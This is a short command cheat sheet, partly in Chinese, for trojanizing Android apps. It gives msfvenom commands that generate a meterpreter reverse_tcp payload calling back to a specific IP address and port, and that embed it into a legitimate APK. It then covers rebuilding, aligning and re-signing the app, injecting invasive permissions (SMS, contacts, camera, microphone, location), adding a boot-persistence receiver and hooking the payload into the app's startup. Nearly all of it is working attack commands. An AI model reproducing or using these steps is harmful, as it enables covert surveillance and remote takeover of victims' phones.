python ftp commands
python3 -m pyftpdlib -p 888 -w
python3 -m http.server 888Andriod backdoor
msfvenom -a dalvik --platform android -p android/meterpreter/reverse_tcp LHOST=103.146.159.130 LPORT=5555 -a dalvik --platform android -e cmd/base64 -i 9 -o Android.apkor
msfvenom --platform android -a dalvik -e generic/none -p android/meterpreter/reverse_tcp LHOST=103.146.159.130 LPORT=5555 -x app-debug.apk -k -o result.apkapktool d app-release.apk -o app-release-assmebly
apktool b app-release-assmebly/ -o app-release-assmebly.apk
zipalign -p -f -v 4 app-release-assmebly.apk app-release-assmebly-zip.apk
zipalign -c -v 4 app-release-assmebly-zip.apk
apksigner sign --ks password.keystore --ks-key-alias password.keystore --ks-pass pass:password --v2-signing-enabled true -v --out app-release-assmebly-zip-sign.apk app-release-assmebly-zip.apk
apktool b app-release-assmebly/ -o app-release-assmebly.apk && zipalign -p -f -v 4 app-release-assmebly.apk app-release-assmebly-zip.apk && zipalign -c -v 4 app-release-assmebly-zip.apk && apksigner sign --ks password.keystore --ks-key-alias password.keystore --ks-pass pass:password --v2-signing-enabled true -v --out app-release-assmebly-zip-sign.apk app-release-assmebly-zip.apk以下内容拷贝到目标apkAndroidManifest.ml文件
<uses-permission android:name="android.permission.INTERNET"/>
<uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
<uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
<uses-permission android:name="android.permission.READ_PHONE_STATE"/>
<uses-permission android:name="android.permission.SEND_SMS"/>
<uses-permission android:name="android.permission.RECEIVE_SMS"/>
<uses-permission android:name="android.permission.RECORD_AUDIO"/>
<uses-permission android:name="android.permission.CALL_PHONE"/>
<uses-permission android:name="android.permission.READ_CONTACTS"/>
<uses-permission android:name="android.permission.WRITE_CONTACTS"/>
<uses-permission android:name="android.permission.WRITE_SETTINGS"/>
<uses-permission android:name="android.permission.CAMERA"/>
<uses-permission android:name="android.permission.READ_SMS"/>
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
<uses-permission android:name="android.permission.SET_WALLPAPER"/>
<uses-permission android:name="android.permission.READ_CALL_LOG"/>
<uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
<uses-permission android:name="android.permission.WAKE_LOCK"/>
<uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"/>
<uses-feature android:name="android.hardware.camera"/>
<uses-feature android:name="android.hardware.camera.autofocus"/>
<uses-feature android:name="android.hardware.microphone"/>
<receiver android:label="MainBroadcastReceiver" android:name="com.metasploit.stage.MainBroadcastReceiver">
<intent-filter>
<action android:name="android.intent.action.BOOT_COMPLETED"/>
</intent-filter>
</receiver>
<service android:exported="true" android:name="com.metasploit.stage.MainService"/>#复制到目标activity oncreat执行
invoke-static {p0}, Lcom/metasploit/stage/MainService;->startService(Landroid/content/Context;)V